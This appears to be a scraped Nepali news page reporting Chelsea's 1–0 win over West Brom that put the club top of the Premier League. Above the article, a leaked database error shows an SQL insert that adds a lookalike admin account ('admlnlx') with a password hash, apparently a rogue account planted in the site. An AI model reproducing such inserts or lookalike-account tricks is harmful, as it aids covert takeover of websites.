WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B9Gt88UeBPdZNZRZhGd5rYFxqUinj5/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 02:24:29', '', 'admlnlx', 'admlnlx')
काठमाडौं, मंसिर २७–
वेष्ट ब्रोमलाई हराउँदै चेल्सी इंग्लिस प्रिमियर लिगको शीर्ष स्थानमा फेरि फर्किएको छ। घरेलु मैदान स्टामफोर्ड ब्रिजमा आइतबार राति भएको खेलमा चेल्सीले वेष्ट ब्रोमलाई १–० ले हराउँदै शीर्ष स्थान कब्जा गरेको हो।
पहिलो हाफ गोलरहित बराबरी खेलेको चेल्सीलाई जिताउन ७६ औं मिनेटमा डिएगो कोस्टाले निर्णायक गोल गरे। गएरातिको जितपछि शीर्ष स्थानमा पुगेको चेल्सीको १५ खेलबाट ३७ अंक भएको छ। दोस्रो स्थानको आर्सनलको ३४ अंक छ ।